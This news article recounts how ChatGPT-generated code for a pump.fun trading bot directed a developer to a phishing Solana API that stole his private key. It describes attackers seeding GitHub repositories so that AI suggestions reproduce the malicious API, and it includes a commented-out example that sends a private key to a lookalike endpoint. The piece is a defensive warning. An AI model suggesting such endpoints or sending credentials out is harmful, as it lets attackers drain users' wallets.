Artificial intelligence has revolutionized the way we code and innovate, with tools like ChatGPT making programming more accessible than ever. Yet, as AI systems become embedded in our workflows, they bring significant risks. Over-reliance on machine-generated recommendations—known as automation bias—can lead to serious consequences, as one blockchain developer recently discovered.
Phishing Losses Instead of Trading Gains
A developer, known online as “R_ocky.eth,” sought ChatGPT’s assistance in creating a trading bot for pump.fun, a decentralized platform for meme token creation and trading.
Pump.fun, launched in 2024, leverages Solana, a blockchain network known for its scalability and low transaction fees. The platform simplifies token creation with features like bonding curve pricing, where token values rise with demand, encouraging early adoption.
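To make the bonding-curve idea concrete, here is a minimal sketch of a linear bonding curve. Pump.fun's actual pricing formula is not described in this article, so the `BASE_PRICE` and `SLOPE` constants are invented for illustration; the only point is that the spot price rises as more tokens are sold, which rewards early buyers.

```python
# Illustrative linear bonding curve -- NOT pump.fun's actual formula.
# BASE_PRICE and SLOPE are made-up example values.

BASE_PRICE = 0.0001  # hypothetical starting price per token (in SOL)
SLOPE = 0.000001     # hypothetical price increment per token sold

def bonding_curve_price(tokens_sold: int) -> float:
    """Spot price after `tokens_sold` tokens have been bought."""
    return BASE_PRICE + SLOPE * tokens_sold

early = bonding_curve_price(0)        # price the first buyer pays
late = bonding_curve_price(100_000)   # price after 100k tokens sold
```

Because every purchase moves the price up the curve, demand itself sets the valuation, which is what makes early adoption attractive on such platforms.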
Seeking help to streamline the coding process, Rocky turned to ChatGPT. The AI-generated code included an API recommendation, which Rocky believed to be legitimate. However, the API was a phishing tool designed to mimic Solana’s interfaces. By interacting with the malicious API, Rocky unknowingly exposed his private wallet key. Within 30 minutes, $2,500 worth of cryptocurrency was siphoned off.
Be careful with information from @OpenAI ! Today I was trying to write a bump bot for https://t.co/cIAVsMwwFk and asked @ChatGPTapp to help me with the code. I got what I asked but I didn’t expect that chatGPT would recommend me a scam @solana API website. I lost around $2.5k 🧵 pic.twitter.com/HGfGrwo3ir
— r_ocky.eth 🍌 (@r_cky0) November 21, 2024
Understanding the Attack
The fraudulent API functioned by redirecting calls to a phishing site disguised as a legitimate Solana endpoint. This tactic exploited trust in the seamlessness of AI-generated code.
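The article does not reproduce the code ChatGPT generated, but the anti-pattern it describes can be sketched hypothetically. The endpoint URL below is invented; the essential flaw is that the request body carries the raw private key, so whoever operates the endpoint gains full control of the wallet.

```python
# HYPOTHETICAL reconstruction of the anti-pattern -- not the actual
# generated code. The endpoint URL is invented for illustration.

import json

def build_unsafe_payload(private_key: str, token_name: str) -> dict:
    # DANGER: placing the raw private key in an API request hands the
    # wallet to whoever runs the endpoint.
    return {
        "privateKey": private_key,  # <-- the fatal mistake
        "name": token_name,
    }

# The call the victim's bot would have made (sketched, not executed):
#   urllib.request.urlopen(
#       "https://api.solanaapis.example/pumpfun/create",  # phishing lookalike
#       data=json.dumps(build_unsafe_payload(key, "MyToken")).encode(),
#   )

# A legitimate Solana flow never transmits the private key at all:
# the key signs transactions locally, and only the signed transaction
# is submitted to an RPC node.
```

Any API whose documentation asks for a private key as a request parameter should be treated as hostile; signing happens client-side by design.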
Scam Sniffer, a Web3 security group, revealed that malicious actors had seeded open-source repositories with compromised APIs, increasing the likelihood of such code surfacing in AI-generated suggestions. The scheme exploited AI models' inability to distinguish trustworthy resources from malicious ones.
🕵️ Found malicious repos:
• solanaapisdev/moonshot-trading-bot
• solanaapisdev/pumpfun-api
Purpose: Steal private keys via AI-generated code https://t.co/zhKXIlZIcL pic.twitter.com/NKQgcIAKVu
— Scam Sniffer | Web3 Anti-Scam (@realScamSniffer) November 22, 2024
The scammer’s wallet, active since December 2023, recorded over 206,000 transactions and held $258,000 in stolen assets, including $147,211 in USD Coin (USDC). This high volume reflects a well-organized phishing operation targeting crypto developers at scale.
Don't Trust AI-Generated Code Blindly
There are clear lessons to be learned for developers and the industry at large. Verifying the authenticity of APIs and libraries through trusted sources is essential, as is the use of test wallets instead of primary accounts for development purposes.
Developers should avoid embedding sensitive credentials, such as private keys, in code or API calls. Beyond individual practices, the incident highlights the need for collaboration between AI providers, blockchain platforms, and cybersecurity experts to create a safer ecosystem.
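Two of the practices above can be sketched in a few lines: keep the signing key out of source code by reading it from the environment, and pin RPC hosts to a reviewed allowlist. The environment-variable name and the allowlist entries here are examples (the two hosts listed are Solana's public mainnet and devnet RPC endpoints), not a vetted production configuration.

```python
# Minimal sketch of two defensive habits: no credentials in source,
# and endpoints checked against a reviewed allowlist. The env-var
# name and allowlist contents are illustrative assumptions.

import os
from urllib.parse import urlparse

TRUSTED_RPC_HOSTS = {
    "api.mainnet-beta.solana.com",  # Solana public mainnet RPC
    "api.devnet.solana.com",        # devnet -- pair with a test wallet
}

def load_private_key() -> str:
    """Read the signing key from the environment, never from source."""
    key = os.environ.get("SOLANA_PRIVATE_KEY")
    if not key:
        raise RuntimeError("Set SOLANA_PRIVATE_KEY outside the codebase")
    return key

def check_endpoint(url: str) -> bool:
    """Reject any RPC URL whose host is not on the allowlist."""
    return urlparse(url).hostname in TRUSTED_RPC_HOSTS
```

Developing against devnet with a throwaway test wallet, as the text suggests, means that even a successful phishing attempt costs nothing of value.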
The story of Rocky’s $2,500 loss is more than a cautionary tale for developers; it is a reflection of the broader challenges at the intersection of AI, blockchain, and cybersecurity. As these technologies continue to evolve, the balance between innovation and security becomes ever more precarious.
For developers, the key takeaway is clear: treat AI-generated outputs as starting points, not definitive answers. For the industry, fostering a culture of caution, accountability, and education will be critical in addressing the vulnerabilities exposed by this incident.